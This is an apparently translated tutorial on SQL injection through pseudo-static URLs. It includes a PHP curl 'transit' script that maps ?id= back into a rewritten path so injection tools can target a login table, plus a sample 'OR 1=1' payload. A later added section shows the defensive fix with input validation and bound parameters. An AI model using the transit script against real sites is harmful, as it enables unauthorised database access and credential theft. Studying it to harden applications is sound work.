As for the pseudo-static website injection method, laruence literacy comes. Generally, the URL of a dynamic script website looks like the following:
http://www.bkjia.com/news.php?id=111
After pseudo-static rewriting, it looks like this:
http://www.bkjia.com/news.php/id/111.html
The slash "/" replaces the query-string operators, and ".html" is appended at the end. As a result, tools cannot be used directly for injection.
Now let's discuss how to use tools for injection anyway. We all know about cookie injection; the principle here is similar:
we write a dynamic web page script that builds the URL according to our own rules and accesses the target page through this script.
That is, we change the pseudo-static URL rule back to the original ?id=123 form, giving an ordinary URL that can easily be injected.
Okay, let's try it out! I set up a simple injection point locally using thinkphp,
because thinkphp comes with simple pseudo-static URLs, which makes it easier to demonstrate.
The SQL statement for this injection point is as follows; the id is received via GET:
SELECT account AS username, password FROM think_user WHERE id = 1
The page URL is as follows:
http://www.bkjia.com/index.php/index/id/111.html
The value 111 is the part to change in order to inject.
Since I am familiar with PHP, I use PHP to write the injection transit page.
Source code of the tmd.php transit page:
<?php
// Transit page: takes ?id=... and requests the pseudo-static URL built from it.
set_time_limit(0);
$id = $_GET["id"];
// Encode spaces and "=" so the value fits into the URL path.
$id = str_replace(" ", "%20", $id);
$id = str_replace("=", "%3D", $id);
// $url = "http://www.bkjia.com/test/id-shortid.html";
$url = "http://www.bkjia.com/inj/index.php/index/id/$id.html";
// echo $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
Save this file as tmd.php. The URL of this file is as follows:
http://www.bkjia.com/inj/tmd.php
Place the $id generated for injection at the position required by the pseudo-static rules of the target page, as shown above.
The principle is to use curl to obtain the content of the target page (the same as accessing the target page directly).
You only need to modify the content of $url to adapt to various pseudo-static rules.
The script is relatively simple. Readers who need them can add POST, proxy, referer, and other functions.
Now, accessing http://www.bkjia.com/inj/tmd.php?id=111
is equivalent to accessing http://www.bkjia.com/inj/index.php/index/id/111.html,
so we can put the link http://www.bkjia.com/inj/tmd.php?id=111 into the injection tool.
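
The transit page works because the rewrite rule only moves the parameter into the path; the value between /id/ and .html still reaches the SQL statement. The following is an added example, not code from the original page or from thinkphp, showing the defensive counterpart: strict validation of the path segment plus a bound integer parameter. The function names parse_pseudo_static_id() and find_user(), the in-memory SQLite database, and the sample row and paths are assumptions constructed for the illustration.

```php
<?php
// Added example (not from the original page): hardened handling of a
// pseudo-static id such as /index.php/index/id/111.html.
// parse_pseudo_static_id() and find_user() are hypothetical names.

// Extract the id segment and accept only a short run of digits.
function parse_pseudo_static_id(string $path): ?int
{
    // The rewrite rule only relocates the parameter; whatever sits between
    // "/id/" and ".html" is still untrusted input.
    if (!preg_match('#/id/([^/]*)\.html$#D', $path, $m)) {
        return null;
    }
    $raw = rawurldecode($m[1]);
    // Reject anything that is not 1-9 digits (spaces, quotes, "=", ...).
    if (!preg_match('/^[0-9]{1,9}$/D', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Bind the id as an integer parameter instead of concatenating it.
function find_user(PDO $db, int $id): ?array
{
    $stmt = $db->prepare(
        'SELECT account AS username, password FROM think_user WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE think_user (id INTEGER PRIMARY KEY, account TEXT, password TEXT)');
$db->exec("INSERT INTO think_user VALUES (111, 'demo', 'constructed-hash')");

// Constructed request paths: a normal one, and one with extra SQL text
// encoded the way the transit page encodes spaces and "=".
$paths = ['/index.php/index/id/111.html', '/index.php/index/id/111%20OR%201%3D1.html'];
foreach ($paths as $path) {
    $id = parse_pseudo_static_id($path);
    $row = $id === null ? null : find_user($db, $id);
    echo $path, ' => ', $row === null ? 'no result' : $row['username'], PHP_EOL;
}
```

The validation alone would stop this particular request, but the bound parameter is what keeps the query safe if a later route forgets the check.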